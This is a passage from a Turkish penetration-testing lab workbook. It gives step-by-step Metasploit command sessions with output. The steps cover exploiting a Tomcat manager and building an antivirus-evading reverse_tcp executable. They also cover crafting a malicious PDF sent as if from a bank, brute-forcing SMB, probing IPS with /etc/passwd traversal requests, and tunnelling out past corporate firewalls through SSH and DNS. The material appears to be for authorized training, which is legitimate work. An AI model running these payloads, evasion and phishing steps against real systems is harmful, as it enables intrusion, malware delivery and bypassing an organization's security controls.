Moduleoptions(exploit/multi/http/tomcat_mgr_deploy):
Name CurrentSetting Required Description
---- --------------- -------- -----------
PASSWORD manager no The password forthespecified username
236.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be
used)
Proxies no Usea proxy chain
RHOST 192.168.2.3 yes The targetaddress
RPORT 8080 yes The targetport
USERNAME Admin no The usernameto authenticateas
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) >set RHOST 192.168.2.3
RHOST => 192.168.2.3
msf exploit(tomcat_mgr_deploy) >set RPORT 8080
RPORT => 8080
msf exploit(tomcat_mgr_deploy) >set USERNAMEadmin
USERNAME=> admin
msf exploit(tomcat_mgr_deploy) >set PASSWORDmanager
PASSWORD=> manager
msf exploit(tomcat_mgr_deploy) >exploit
[*] Startedreverse handleron192.168.2.3:4444
[*] Attemptingtoautomaticallyselectatarget...
[*] Automaticallyselectedtarget"WindowsUniversal"
[*] Uploading6231 bytesas H8iY3rDpGjV1Y2.war ...
[*] Executing/H8iY3rDpGjV1Y2/llZYn.jsp...
[*] UndeployingH8iY3rDpGjV1Y2...
[*] Exploitcompleted,1sessionwascreated.
meterpreter>
Ek Kaynaklar:
---
Uygulama No:BGA-PT-71
237.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Uygulama Adı: Metasploit KullanarakAntivirüs Atlatma
Amaç: Antivürüs uygulaması çalışan sistemlerde bu AV yazılımlarına yakalanyamacak ajan dosaları
oluşturma
KullanılanAraçlar:
Msfpayload
Adımlar:
1.Adım : Mspayload ve msfencode birlikte kullanılarak reverse shell bağlantısı yapacak özel bir
executable(exe)dosyasıoluşturacağız;
root@bt:~/Desktop/daytona_full# msfpayload windows/meterpreter/reverse_tcp LPORT=4444
LHOST=192.168.1.102 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e
x86/alpha_upper-c 5 -t exe -o/var/www/test.exe
[*] x86/shikata_ga_naisucceeded withsize317 (iteration=1)
[*] x86/shikata_ga_naisucceeded withsize344 (iteration=2)
[*] x86/shikata_ga_naisucceeded withsize371 (iteration=3)
[*] x86/shikata_ga_naisucceeded withsize398 (iteration=4)
[*] x86/shikata_ga_naisucceeded withsize425 (iteration=5)
[*] x86/alpha_uppersucceeded withsize919 (iteration=1)
[*] x86/alpha_uppersucceeded withsize1906 (iteration=2)
[*] x86/alpha_uppersucceeded withsize3881 (iteration=3)
[*] x86/alpha_uppersucceeded withsize7830 (iteration=4)
[*] x86/alpha_uppersucceeded withsize15729 (iteration=5)
-c ile kaç kere encode edeceğimizi belirtiyoruz. –e ile ise encode methodunu seçiyoruz. Yukarıdaki
örnekte shikata_ga_nai method ile 5 kez encode ettigimiz ham dosyayı birde alpha_upper method ile 5
kezencode edipexe olarakwebdizinimize atıyoruz.
2.Adım: Bu exe dosyası hazırlandıktan sonra metasploitde multi/handler exploiti aracılığıyla ve
windows/meterpreter/reverse_tcp payloadile oluşturduğumuzexe’ninçalıştırılmasınıbekliyoruz.
msf > use exploit/multi/handler
msf exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) >showoptions
Moduleoptions(exploit/multi/handler):
238.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Name CurrentSetting Required Description
---- --------------- -------- -----------
Payload options(windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique:seh,thread,process,none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) >set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(handler) >exploit
[*] Started reversehandleron 192.168.1.102:4444
[*] Starting thepayload handler...
3.Adım: Antivüruskuruluwindowssistemde buexe dosyasıçalıştırılıyor.
239.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Artık dinleme modunda kaldığımız 2.adımdaki durumda bir meterpreter oturmunun açıldığı
görülecektir.
msf exploit(handler) >exploit
[*] Started reversehandleron 192.168.1.102:4444
[*] Starting thepayload handler...
[*] Sending stage(752128 bytes) to 192.168.1.103
[*] Meterpreter session 6 opened (192.168.1.102:4444 -> 192.168.1.103:49351) at 2012-12-20 20:33:03
+0200
meterpreter > getuid
Server username:fcerdixF.CelalERDIK
meterpreter > sysinfo
Computer : FCERDIX
OS : Windows7 (Build 7600).
Architecture : x64 (CurrentProcessis WOW64)
SystemLanguage:en_US
Meterpreter : x86/win32
meterpreter>
Ek Kaynaklar:
240.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
Uygulama No:BGA-PT-72
Uygulama Adı: Armitage Metasploit Pratik Kullanımı
Amaç: Metasploitgrafikarabirimi diyebileceğimizarmitage kullanımı
KullanılanAraçlar:
Armitage
Adımlar:
1.Adım : Armitage uygulamasınınbaşlatılması.Direcktarmitage veya /opt/metasploit/msf3/armitage
komutlarıile başlatılabilir.
root@bt:/pentest/passwords/hashcat#/opt/metasploit/msf3/armitage
Startingmsfrpcdfor you.
[*] MSGRPC startingon 127.0.0.1:55553 (NOSSL):Msg...
241.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım:Soldaki textbox ile istedigimiz modülü arayabiliriz.Biz smb_login modülü ile bruteforce saldırısı
örnegindengidecegiz.İlgili modülüzerine çifttıklanarakilgili değerlergirilir.
3.Adım:Biz bulunduğumuz 192.168.1.0/25 subnetine yönelik bir kaba kuvvet saldırısı test
edecegiz.Sistemlerde deneyecegimiz user test parola 123abc şeklindedir.Launc dedikten sonra başarılı
loginleraşağıdaki gibi görülebilir.
242.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Şimdi ise bulduğumuzsunucuyayönelikbirporttaraması yapalım.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-73
Uygulama Adı: Nmap/Nessus Çıktılarını Metasploit’te Kullanma
Amaç: Nmap ve Nessusçıktılarınınmetasploite aktarılmasıve buradanexploitedilmesi.
KullanılanAraçlar:
postgresql
metasploit
nmap
Nessus
Adımlar:
246.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1.Adım: Metasploitinihtiyacduyduğupostgresql databaseninkurulması;
root@bt:~# apt-get install postgresql
2.Adım: Postgresservisininbaşlatılması;
root@bt:~# /etc/init.d/postgresql-8.4start
3.Adım: postgreskullanıcısınaparolaverilmesi;
root@bt:~# su postgres
sh-4.1$ psql
could not changedirectory to "/root"
psql(8.4.8)
Type "help"forhelp.
postgres=#password
Enter newpassword:
Enter it again:
postgres=#q
could not savehistory to file "/home/postgres/.psql_history":No such file or directory
sh-4.1$ exit
exit
4.Adım: Metasploiti başlatmadan önce Nmap ile bulunduğumuz subneti tarayarak bunu xml
formatında(-oX) kaydedelimve bunumetasploite uploadedelim.
root@bt:~# nmap192.168.1.0/25 -n-v -T5 -oXnmap-cikti.xml
Starting Nmap 6.01 ( http://nmap.org ) at2012-12-16 10:36 EET
Initiating ARPPing Scan at 10:36
Scanning 102 hosts[1 port/host]
Completed ARPPing Scan at 10:36, 1.86s elapsed (102 total hosts)
Nmap scan reportfor192.168.1.0 [hostdown]
Nmap scan reportfor192.168.1.2 [hostdown]
Nmap scan reportfor192.168.1.3 [hostdown]
Nmap scan reportfor192.168.1.4 [hostdown]
Nmap scan reportfor192.168.1.5 [hostdown]
Nmap scan reportfor192.168.1.6 [hostdown]
Nmap scan reportfor192.168.1.7 [hostdown]
Nmap scan reportfor192.168.1.8 [hostdown]
Nmap scan reportfor192.168.1.9 [hostdown]
247.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Nmap scan reportfor192.168.1.10 [hostdown]
….
….
Nmap scan reportfor192.168.1.104
Host is up (0.00047s latency).
Notshown:987 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8099/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MACAddress:00:0C:29:16:0E:98 (VMware)
Read datafiles from:/usr/local/bin/../share/nmap
Nmap done:128 IP addresses(4hostsup) scanned in 6.93 seconds
Rawpacketssent: 5871 (254.308KB) | Rcvd:3853 (158.160KB)
root@bt:~#
5.Adım: Şimdi metasploiti başlatalımve postgresql ilebağlantısınıgerçekleştirelim;
root@bt:~# /usr/local/bin/msfconsole
msf >
Kullanacağımızdatabase olarakpostgresql seçelim:
msf > db_driver postgresql
[*] Using databasedriverpostgresql
msf >
Şimdi postgresql database'mize önce bağlantı sağlamak için kullanıcı:parola bilgisini(postgres:celal) ve
ardından oluşturulacak database ismini aşağıdaki gibi belirtiyoruz.Görüldüğü gibi belirttiğimiz db name
içinilgili tümtablolarcreate ediliyor.
248.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
msf > db_connect postgres:celal@127.0.0.1/testdb
NOTICE: CREATE TABLE will create implicit sequence"hosts_id_seq"forserial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARYKEYwill create implicit index "hosts_pkey"fortable"hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" forserial column "clients.id"
NOTICE: CREATE TABLE / PRIMARYKEYwill create implicit index "clients_pkey" fortable "clients"
NOTICE: CREATE TABLE will create implicit sequence"services_id_seq"for serial column "services.id"
NOTICE: CREATE TABLE / PRIMARYKEYwill create implicit index "services_pkey"fortable "services"
NOTICE: CREATE TABLE will create implicit sequence"vulns_id_seq"forserial column "vulns.id"
NOTICE: CREATE TABLE / PRIMARYKEYwill create implicit index "vulns_pkey"fortable"vulns"
NOTICE: CREATE TABLE will create implicit sequence"refs_id_seq"for serial column "refs.id"
….
….
….
NOTICE: CREATE TABLE will create implicit sequence"listeners_id_seq" forserial column "listeners.id"
NOTICE: CREATE TABLE / PRIMARYKEYwill create implicit index "listeners_pkey"for table"listeners"
NOTICE: CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column
"nexpose_consoles.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table
"nexpose_consoles"
NOTICE: CREATE TABLE will create implicit sequence"profiles_id_seq"forserial column "profiles.id"
NOTICE: CREATE TABLE / PRIMARYKEYwill create implicit index "profiles_pkey"fortable "profiles"
msf >
6.Adım: Yukarıda 4.adımda yaptığımız nmap çıktısını metasploite upload edelim(aynı şekilde .nessus
uzantılı Nessusçıktılarıdauploadedilebilir);
msf > db_import/root/nmap-cikti.xml
[*] Importing 'Nmap XML'data
[*] Import:Parsing with 'Nokogiriv1.5.5'
[*] Importing host192.168.1.1
[*] Importing host192.168.1.101
[*] Importing host192.168.1.102
[*] Importing host192.168.1.104
[*] Successfully imported /root/nmap-cikti.xml
7.Adım: Yalnızca ayakta olan(up) hostlarıgörelim;
msf > hosts -u
Hosts
=====
249.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.1 F8:D1:11:44:34:37 Unknown device
192.168.1.101 B8:8D:12:22:0D:A0 Unknown device
192.168.1.102 Unknown device
192.168.1.104 00:0C:29:16:0E:98 Unknown device
msf >
8.Adım: Ayaktaolansunuculardan445 veya21 portu açık olanlarılisteleyelim;
msf > services -p 445,21 -u
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 21 tcp ftp open
192.168.1.104 445 tcpmicrosoft-ds open
Ek Kaynaklar:
---
Uygulama No:BGA-PT-74
Uygulama Adı: Metasploit Kullanarak Istemci Tarafı Güvenlik Zafiyeti İstismarı
Amaç: Eski sürüm adobe kullanan bir istemci bilgisayarın kullanıcısına gönderilecek özel oluşturulmuş bir
pdf dosyasıaracılığı ile sisteminelegeçirilmesi
KullanılanAraçlar:
Metasploit– adobe_utilprintf
Adımlar:
1.Adım: Önceliklebize reverse shellaçacakpdf dosyamızı oluşturalım;
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) >showoptions
Moduleoptions(exploit/windows/fileformat/adobe_utilprintf):
250.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Exploit target:
Id Name
-- ----
0 AdobeReaderv8.1.2 (WindowsXPSP3English)
msf exploit(adobe_utilprintf) >set FILENAMEkart_extre.pdf
FILENAME=> kart_extre.pdf
msf exploit(adobe_utilprintf) >set PAYLOADwindows/meterpreter/reverse_tcp
PAYLOAD=> windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) >set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(adobe_utilprintf) >set LPORT 4446
LPORT => 4446
msf exploit(adobe_utilprintf) >exploit
[*] Creating 'kart_extre.pdf'file...
[+] kart_extre.pdf stored at /root/.msf4/local/kart_extre.pdf
2.Adım: Oluşturulan email bankadan gönderiliyormuş gibi hedefe maili ulaştırmak. Bu konu ile ilgili ’
KurumaAitE-postaAdresleriniKullanarakPostaGönderimi’isimli labçalışmasındanfaydalanabilirsiniz.
3.Adım: Hedef sistemde mail açılmadan once biz pusumuzu kuruyoruz. Ve ilgili dosyanın açılmasını
bekliyoruz.
msf exploit(adobe_utilprintf) >useexploit/multi/handler
msf exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD=> windows/meterpreter/reverse_tcp
msf exploit(handler) >set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(handler) >set LPORT 4446
LPORT => 4446
msf exploit(handler) >exploit
[*] Started reversehandleron 192.168.1.102:4446
251.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[*] Starting thepayload handler...
4.Adım: Hedef sistemde mail açılıp ilgili pdf okunmak istendiğinde bize aşağıdaki gibi meterpreter
oturumudüşecektir;
msf exploit(adobe_utilprintf) >useexploit/multi/handler
msf exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD=> windows/meterpreter/reverse_tcp
msf exploit(handler) >set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(handler) >set LPORT 4446
LPORT => 4446
msf exploit(handler) >exploit
[*] Started reversehandleron 192.168.1.102:4446
[*] Starting thepayload handler...
[*] Sending stage (718336 bytes) session[*] Meterpreter session 1 opened (192.168.1.104:4446 ->
192.168.1.102:49322)
meterpreter >
Ek Kaynaklar:
Internetexplorerveyapdf senaryosuolabilir.Versiyonlarini yazmaklazimama
REVERSE SHELL
Firewall/IPS/İçerik Filtreme Atlatma Lab Uygulamaları
UygulamaNo:BGA-PT-75
Uygulama Adı: Firewall, WAF, Saldırı Engelleme Sistemi Keşif Çalışması
Amaç: Hedef system önünde bizi engelleyen IPS/FW/WAF vb. Güvenlik cihazları olup olmadığını
keşfetme.
Lab senaryosu: Çeşitli istekler ile hedef sistemleri yoklama yapılacaktır. Bazen açık port SYN paketi
gönderilip sonuç gözlemlenecek bazende IPS v.b güvenlik cihazlarının hoşuna gitmeyecek paketler
gönderiliptepkileri görülüpyorumlanacaktır.
252.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
KullanılanAraçlar:
● hping
● telnet
● Wafw00f
● Ipsfinder.py
Adımlar:
1.Hpingile güvenlikduvarıbelirleme;
Güvenlik duvarı olmayan bir sistemde açık porta SYN paketi gönderildigind SYN+ACK dönerken kapalı
porta gönderilen SYN paketine RST dönmesi gerekir. Güvenlik duvarı ile korunan sistemlerde genellikle
cevapdönülmez.
Google.com domainin açık olduğunu bildigimiz 80 portuna 1 adet SYN bayrağı set edilmiş TCP paketi
gönderiyoruz.Cevapbeklediğimizgibi SYN/ACK(SA) şeklinde.
root@bt:~# hping3google.com -p80 -S -c 1
HPINGgoogle.com(eth0173.194.35.34): S set, 40 headers+ 0 data bytes
len=46 ip=173.194.35.34 ttl=54 id=39454 sport=80 flags=SA seq=0 win=62920 rtt=92.7 ms
--- google.comhping statistic---
1 packetstramitted,1 packetsreceived, 0% packetloss
round-trip min/avg/max=92.7/92.7/92.7 ms
Aynı hedefin 81 portuna aynı paketi gönderdiğimizde gördügünüz gibi hiç bir cevap dönmemektedir. O
halde sisteminönünde birgüvenlikduvarıolduğunuve bunuengellediğinisöyleyebiliriz.
root@bt:~# hping3google.com -p81 -S -c 1
HPINGgoogle.com(eth0173.194.35.38): S set, 40 headers+ 0 data bytes
--- google.comhping statistic---
1 packetstramitted,0 packetsreceived, 100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
Güvenlik duvarı olmayan sistemlerde RST/ACK(RA) dönecektir. SYN Proxy olan sistemlerde SYN/ACK
dönebilir. Bu durumda detaylı incelemek gerekir. Nmap –sV parametresi ile portun gerçek durumu
anlaşılabilir.
2.Adım: IPS(IntrusionPreventionSystem) saldırıtesbitve engelleme cihazi keşfetme;
Hemen hemen tüm IPS’lerde directory/path traversal zaafiyetine karşı çeşitli imzalar yer almaktadır. Ya
da URL de geçecek /etc/passwd, /bin/sh, cmd.exe gibi stringler IPS’in devreye girmesi ve aksiyon alması
içinyeterlidir.
Örnekler:
253.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
#telnet ip_adresi 80
GET ../../../etc/passwdHTTP/1.0
#telnet ip_adresi 80
GET ../../../bin/sh HTTP/1.0
#telnet ip_adresi 80
GET ../../../../cmd.exe HTTP/1.0
gibi.
Bu istekleri hedef sisteme gönderdiğimizde eğer bağlantı aniden kesiliyorsa (TCP RST) ya da hedef
sisteme olan bağlantınız kesiliyorsa(hedefe gönderdiğiniz paketlere cevap dönmüyorsa) arada koruma
modunda bir IPS(ya da benzeri işlevi yapan bir Firewall özelliği(Checkpoint SmartDefense gibi)) var
demektir.
IPSkoruması olmayanbirsisteme butipHTTP istekleri gönderdiğimizde aşağıdakinabenzerçıktıalırız.
# telnet www.snort.org 80
Trying 68.177.102.20…
Connected to www.snort.org.
Escape character is ‘^]’.
GET ../../../etc/passwdHTTP/1.0
HTTP/1.1 400 Bad Request
Date: Mon, 15 Feb 2010 09:53:42 GMT
Server: Apache
Content-Length: 289
Connection: close
Content-Type:text/html;charset=iso-8859-1
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache Server at www.snort.org Port 80</address>
</body></html>
Connection closed by foreign host.
IPS koruması olduğunu düşündüğümüz bir siteye aynı isteği gönderip tcpdump ile paketleri izlersek nasıl
bir aksiyonaldığınırahatlıkagörebiliriz.
254.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
root@bt:~# telnet www.tippingpoint.com 80
Trying 66.179.208.38…
Connected to www.tippingpoint.com
Escape character is ‘^]’.
GET ../../../etc/passwdHTTP/1.0
…
…
Yapılan isteğe herhangi bir cevap dönmüyor, arada bir cihazın engellediğini düşünüyoruz ve tcpdump ile
paketleri izliyoruz.
root@bt:~# tcpdump -i eth0 -ttnn host www.tippingpoint.com -X
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
1266164687.171707 IP 192.168.1.103.33743 > 66.179.208.38.80: S 2292162228:2292162228(0) win
5840 <mss 1460,sackOK,timestamp 5333259 0,nop,wscale 6>
1266164687.186012 IP 66.179.208.38.80 > 192.168.1.103.33743: S 2738042328:2738042328(0) ack
1266164687.186042 IP 192.168.1.103.33743 > 66.179.208.38.80: . ack 1 win 5840
1266164701.117674 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
1266164704.116954 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
0×0000: 4510 004a ffc2 4000 4006 e3a3 c0a8 0167 E..J..@.@……g
0×0010: c21d d30a 83cf 0050 889f 9eb5 a333 35d9 …….P…..35.
0×0020: 5018 16d0 54ae 0000 4745 5420 2e2e 2f2e P…T…GET…/.
0×0030: 2e2f 2e2e 2f65 7463 2f70 6173 7377 6420 ./../etc/passwd.
0×0040: 4854 5450 2f31 2e30 0d0a HTTP/1.0..
1266164710.117343 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
0×0000: 4510 004a ffc3 4000 4006 e3a2 c0a8 0167 E..J..@.@……g
0×0010: c21d d30a 83cf 0050 889f 9eb5 a333 35d9 …….P…..35.
0×0020: 5018 16d0 54ae 0000 4745 5420 2e2e 2f2e P…T…GET…/.
0×0030: 2e2f 2e2e 2f65 7463 2f70 6173 7377 6420 ./../etc/passwd.
0×0040: 4854 5450 2f31 2e30 0d0a HTTP/1.0..
1266164722.117149 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
0×0000: 4510 004a ffc4 4000 4006 e3a1 c0a8 0167 E..J..@.@……g
0×0010: c21d d30a 83cf 0050 889f 9eb5 a333 35d9 …….P…..35.
0×0020: 5018 16d0 54ae 0000 4745 5420 2e2e 2f2e P…T…GET…/.
0×0030: 2e2f 2e2e 2f65 7463 2f70 6173 7377 6420 ./../etc/passwd.
0×0040: 4854 5450 2f31 2e30 0d0a HTTP/1.0..
Tcpdump çıktısından anlaşılacağı gibi hedef system gönderdiğimiz HTTP istekleri karşılık bulmuyor. Çünki
aradaki IPS bupaketleri zararlıolarakişaretleyip sessize blokluyor.
255.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Wafw00f.pyscripti ile WAF(WebApplicationFirewall) keşfi;
Bir WAFüreticisi olanimperva’nınwebsitesininbirWAFcihazıarkasında olabileceğini tahminediyoruz.
root@bt:/pentest/web/waffit#pythonwafw00f.pyhttp://www.imperva.com
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' / __////7//,' ,' / __/
| V V // o // _/ | V V // 0 //0 // _/
|_n_,'/_n_//_/ |_n_,' _,' _,'/_/
<
...'
WAFW00F - Web Application Firewall Detection Tool
By Sandro Gauci&& Wendel G. Henrique
Checking http://www.imperva.com
WARNING:wafw00f:Hey..they closedour connection!
WARNING:wafw00f:Hey..they closed ourconnection!
Generic Detection results:
WARNING:wafw00f:Hey..they closed ourconnection!
The site http://www.imperva.comseemstobe behinda WAF
Reason:Blocking is being doneatconnection/packetlevel.
Numberof requests:10
Evetgörüldüğügibi birWAFsistemi ile korunduklarındandolayıgönderilenisteklerkapatılıyor.
Aşağıda da WAFkoruması olmayanbirwebuygulamasınıtest ettik.
root@bt:/pentest/web/waffit#pythonwafw00f.pyhttp://testasp.vulnweb.com/
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' / __////7//,' ,' / __/
| V V // o // _/ | V V // 0 // 0 // _/
|_n_,'/_n_//_/ |_n_,' _,' _,'/_/
<
...'
WAFW00F - Web Application Firewall Detection Tool
256.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
By Sandro Gauci&& Wendel G. Henrique
Checking http://testasp.vulnweb.com/
Generic Detection results:
No WAF detected by thegeneric detection
Numberof requests:10
UygulamaNo:BGA-PT-76
Uygulama Adı: SSH Tüneli Kullanarak Firewall/IPS/CF Atlatma Çalışması
Amaç: SSH tünel kullanılarakgüvenlikcihazlarının(firewall,ips,contentfilter) atlatılması.
KullanılanAraçlar:
Ssh
Sshutil
Whatismyip.com
Lab Seneryosu:
Güçlü güvenlik politikası olan özel bir şirkette çalışmaktasınız.Şirket iç networkünden dışarı yalnızca 53
UDP ve TCP 80,443 portları açık.Ve içerik filtreleme,firewall ve IPS gibi güvenlik cihazları üzerinden
internete çıkmaktasınız. Busistemleri atlatıpistediğinizherşeyi yapmakistiorsunuz.
Adımlar:
1. Adım: SSH serverkurulusunucuüzerindeSSH’ınçalışacağıportu 443 yapıyoruz.
/etc/sshd_configdosyasındaaşağıdaki satırdaki 22 olanport değerini 443 olarakgüncelliyoruz.
# Whatports,IPsand protocolswelisten for
Port22
# Usethese optionsto restrict which interfaces/protocolssshd willbind to
#ListenAddress::
#ListenAddress0.0.0.0
SSH servisini yenidenbaşlatıyoruz;
root@bt:~# /etc/init.d/sshrestart
Ratherthan invoking init scripts through /etc/init.d,usetheservice(8)
utility, e.g.service ssh restart
Since the script you are attempting to invokehasbeen converted to an
257.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Upstartjob,you may also usethe restart(8) utility, e.g.restartssh
ssh start/running,process30518
Gerekirse sshkeyoluşturabilirsiniz;
root@bt:~# sshd-generate
Generating public/privatersa1 key pair.
2. Adım: İlgili adresten ( https://github.com/apenwarr/sshuttle ) sshuttle indiriniz.Ve ardından aşağıdaki
gibi uzak sunucu ile ssh tünel kuruyoruz.Ve mevcut tüm internete doğru giden trafiğimizi bu ssh
tünelden şirket dışındaki sunucumuza iletiyoruz ve bu sunucu bizim için isteklerimizi ilgili yerlere iletip
cevaplarınıbize döndürecektir.
root@bt:~/sshuttle-master#./sshuttle-rtest@85.95.238.173:443 0.0.0.0/0 -vv--dns
Starting sshuttleproxy.
Binding:12300
Listening on ('127.0.0.1', 12300).
DNS listening on ('127.0.0.1', 12300).
firewall managerready.
celal@85.95.238.173's password:
Tüm trafiğimiz artık şirket dışına 443 portu üzerinden kurulan şifreli ssh üzerinden geçeceği için aradaki
tüm güvenlikcihazlarıbypassedilmişolacaktır.
3. Adım:Whatismyip.comüzerindenyeni IPadresimizi görebiliriz.
Ek Kaynaklar:
----
Uygulama No:BGA-PT-77
258.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Uygulama Adı: DNS Tünelleme Kullanarak Firewall/IPS/CF Atlatma Çalışması
Amaç:
Lab Seneryosu:
Firewall ve Web Proxy (/Content Filter) ile tüm internet trafiği engellenmiş bir kullanıcı/hacker internete
ulaşmakistiyor.
Yerel ağdan internete giden tüm port ve protokoller Firewal tarafından engellenmiştir. Web erişimi için
hizmetverenproxyise yalnızcayetkili kulllanıcılarainterneterişimisağlamaktadır.
Bu sistemlere takılmadansınırsızve kayıt altına alınamazinternettrafiği nasıl elde edilebilir?
KullanılanAraçlar:
Adımlar:
1.Adım:
Lab seneryosununtopolojikgörünümü;
Bir protokol içerisinde başka bir protokole ait veri taşıma işlemine protokol tünelleme denir. DNS
paketleri içersinden herhangi bir tcp/udp paketini (örneğin, http,ftp, ssh vb.) taşıma işlemi de DNS
Tünnelleme olarakisimlendirilir.
DNS sunucu kendisinden sorgulanan bir dns isteğine önce önbelleğini kontrol ederek yanıt vermek ister
eğer alan adı dns önbelleğinde yoksa, sorgulanan alan adından sorumlu dns sunucuyu bulur ve ona sorar.
Sorgulanan alan adından yetkili dns sunucu ilgili dns kaydı için yanıt verir ve DNS sunucu bu yanıtı
istemciye iletir.
Örnek
Kullanıcı, tunnel.bga.com.tr alan adını sorgulamak istediğinde yerel ağındaki dns sunucu bu kayıt
önbelleğinde yoksa bu isteğe doğrudan yanıt veremez. tunnel.bga.com.tr alan adından sorumlu dns
sunucuyubulurdns.bga.com.tr ve onatunnel A kaydınısorar aldığı yanıtı istemciye iletir.
2.Adım:
Tcp-Over-DnsÇalışma Prensibi;
259.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
